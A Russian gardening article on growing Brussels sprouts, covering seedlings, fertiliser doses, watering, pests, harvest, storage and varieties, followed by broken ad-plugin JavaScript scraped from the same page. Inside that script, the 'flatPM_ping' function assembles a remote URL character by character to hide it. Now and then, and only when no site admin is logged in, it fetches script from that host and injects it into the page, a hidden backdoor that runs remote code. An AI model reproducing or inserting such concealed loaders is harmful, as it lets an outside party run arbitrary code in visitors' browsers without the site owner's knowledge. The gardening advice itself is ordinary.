  • на 12 часов замочить в растворе Корневина или Эпина;
  • промыть и на сутки убрать в холодильник (ящик для овощей);
  • просушить семена, чтобы во время посева они не липли к пальцам.

Посев брюссельской капусты на рассаду

Посев брюссельской капусты нужно производить в отдельные горшочки со смесью из дерновой земли, торфа и песка (в равных пропорциях). Перед посевом в грунт добавляют 3-4 ст.л. древесной золы и 0,5 ст.л. суперфосфата на 1 кг смеси. Если высадка производится в большие емкости, то расстояние между семенами должно быть не меньше 4 см.

Семена заглубляют на 1,5 см, увлажняют, а затем емкость с ними выносят на балкон. Для лучшего качества рассады температура воздуха днем должна быть не выше 16-18°C, а ночью около 5-6°C, кроме того, в помещении должно быть достаточно влажно (около 70%).

Первые 2 недели рассаду не поливают, а затем начинают следить за тем, чтобы грунт всегда был слегка влажным, не заливая, но и не пересушивая его. В фазе развития семядольных листьев капусту необходимо пикировать в отдельные емкости, при необходимости подрезав основной корень. Делать это нужно, предварительно полив рассаду, и вместе с комом земли.

Чем подкормить рассаду брюссельской капусты

Рассаду брюссельской капусты за время выращивания подкармливают дважды, причем после каждой подкормки обильно поливают. Первый раз это делают, когда на сеянцах разовьются 2 настоящих листа. Для приготовления смеси в 10 л воды растворяют 40 г суперфосфата, 20 г аммиачной селитры и 10 г сернокислого калия. Второй раз (через 2 недели) раствор меняют. Теперь на 10 л воды нужно внести 60 г суперфосфата, 30 г аммиачной селитры и 20 г сернокислого калия.

Высадка рассады брюссельской капусты в гряды

Рассада считается готовой к переезду на постоянное место, когда на ней разовьется 4-5 настоящих листьев. Чаще всего это случается к концу мая или началу июня.

Подготовка брюссельской капусты к высадке начинается за 2 недели до самого действа. Постепенно (от 30 минут в день) пребывание рассады на открытом воздухе доводят до суток и лишь потом высаживают. За 4-5 дней до высадки рассаду перестают поливать, а за несколько часов до процедуры обильно смачивают грунт водой.

Для высадки брюссельской капусты в грунт лучше выбрать пасмурный день или проводить ее вечером, когда прямой солнечный свет уже не попадает на гряду.

Активнее всего брюссельская капуста растет и плодоносит на плодородных грунтах с pH 6,7-7,4, а также на освещенных участках. Для нее необходимо выбрать место, где в последние 4 года не росли крестоцветные, помидоры и свекла. В перекопанную и раскисленную с осени гряду весной вносят по ведру компоста или перегноя на 1 кв.м, а в каждую лунку добавляют 2 стакана древесной золы, 2 ст.л. суперфосфата и 1 ч.л. мочевины.

Размещают капусту по схеме 60×60 см, при этом лунки должны быть чуть больше, чем рассадный горшочек. Переваливают рассаду вместе с комом земли, присыпают грунтом, уплотняют его и обильно проливают.

Уход за брюссельской капустой

Выращивание брюссельской капусты практически ничем не отличается от выращивания белокочанной. Правда, есть некоторые особенности. Так, например, брюссельская не нуждается в окучивании, ведь оно приводит к загниванию нижних кочанчиков, а порой и всего стебля.

Когда и чем подкармливать брюссельскую капусту

Удобрения, вносимые под брюссельскую капусту, повышают ваши шансы не только на хороший урожай, но и на здоровые растения, поэтому пропускать подкормки не стоит. Всего за время выращивания на грядах эта культура нуждается в 2 минеральных подкормках, однако если вы выращиваете ее на плодородной почве, можете обойтись лишь одной.

Срок проведения Средство Норма расхода
Через неделю после высадки на гряду 1 ч.л. нитрофоски на 10 л воды 5 л на растение
В начале образования кочанчиков 25 г суперфосфата, 25 г сернокислого калий, 1 ч.л. нитроаммофоски на 10 л воды 1,5 л на растение

Как поливать брюссельскую капусту

Эта культура влаголюбива и отзывчива на поливы. Проводить их нужно каждую неделю, расходуя 30-35 л воды на 1 кв.м до появления кочанчиков, и 40-45 л после того, как они начнут формироваться.

После полива капусту необходимо прорыхлить и избавить от сорняков. В периоды дождей или высокой влажности частоту поливов нужно снижать и не допускать застоя воды в прикорневой зоне растений.

Вредители и болезни брюссельской капусты

В этом брюссельская капуста также сходна со всеми остальными крестоцветными – она страдает теми же заболеваниями и боится тех же вредителей. Из насекомых на посадках чаще всего можно встретить крестоцветную блошку, капустного листоеда, капустную и ростковую муху, волнистую и черную блошек, капустную белянку, огневку, тлю и моль, капустного и рапсового клопа, медведку, совку, проволочника и рапсового цветоеда.

Брюссельская капуста после нашествия капустного листоеда

Самые распространенные болезни брюссельской капусты – это кила, белая и сухая гнили, черная ножка, черная и кольцевая пятнистости, ложная мучнистая роса, сосудистый и слизистый бактериозы и мозаика.

Как защитить брюссельскую капусту

Профилактика заболеваний и нашествия насекомых всегда обходится дешевле, чем борьба с ними. Поэтому для того чтобы уберечь свою брюссельскую капусту, не забывайте о ряде мер:

  • соблюдайте севооборот, не высаживайте крестоцветные на одной гряде несколько лет подряд;
  • убирайте с гряд все растительные остатки;
  • не закладывайте больные растения в компост, а вывозите или сжигайте;
  • регулярно удаляйте с гряд сорняки;
  • не пропускайте минеральные подкормки и не заменяйте их одними лишь органическими;
  • при первых признаках заболевания удаляйте пораженное растение, а почву под ним проливайте розовым раствором марганцовки;
  • регулярно опыляйте растения и гряды древесной золой или ее смесью с табачной пылью;
  • при массовых атаках вредителей используйте инсектициды Амбуш, Децис, Каратэ, Ровикурт, Корсар и др.;
  • при появлении признаков грибковых заболеваний обработайте посадки фунгицидами Квадрис, Фундазол, Скор, Топаз по инструкции.

Уборка и хранение брюссельской капусты

Первые кочанчики на брюссельской капусте созревают уже через 3 месяца после ее высадки в грунт, однако это не повод спешить с уборкой урожая. Отрицательные температуры лишь на пользу вкусу капусты, к тому же никак не влияют на содержание в ней витаминов и питательных веществ, поэтому уборочную смело можно отложить до холодов.

За 3-3,5 недели до уборки капусты подрежьте ей верхушку и удалите все листья, чтобы силы шли на вызревание плодов. Снимайте постепенно нижние плоды, оставляя верхним возможность «дойти». Дождитесь, когда отметка термометра опустится ниже –6°C, но не дойдет до –10°C – в это время кочанчики наиболее пригодны к сбору для хранения.

Для разных сроков и вариантов хранения срезать брюссельскую капусту нужно по-разному:

  • для длительного хранения в подполе выкопайте капусту с корнем, обрежьте ей листья и прикопайте в ящиках с землей, плотно придвинув растения друг к другу;
  • для хранения в подвесном виде или на полках срежьте стебель над грунтом, обрежьте листья и верхушку, а стебли с кочанчиками обсушите и отнесите на постоянное место;
  • также кочанчики на стебле можно завернуть в пленку и до 1,5 месяцев хранить в холодильнике;
  • дольше всего срезанные кочанчики хранятся в заморозке после предварительной бланшировки или без нее.

Лучшие сорта брюссельской капусты

Если вы не знаете, какой сорт брюссельской капусты выбрать, ориентируйтесь в первую очередь на климат своего региона и такой показатель, как срок созревания. Если лето у вас короткое, выбирайте скороспелые сорта, если же до холодов достаточный запас времени, можете поэкспериментировать со средне- и позднеспелыми.

Раннеспелые сорта брюссельской капусты (срок созревания до 130 дней): Гранатовый браслет, Долмик, Изабелла, Касио, Командор, Розелла, Руднеф, Франклин.

Среднеспелые сорта брюссельской капусты (срок созревания от 130 до 150 дней): Бриллиант, Боксер, Веселая компания, Гранат, Геркулес, Дауэр Ризен, Перфекшн.

Позднеспелые сорта брюссельской капусты (срок созревания от 150 до 180 дней): Грюнигер, Завитка.

Теперь, когда вам известно все о выращивании брюссельской капусты, осталось лишь купить семена и запастись терпением. Возможно, уже в этом сезоне у вас появится новый фаворит среди овощей.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};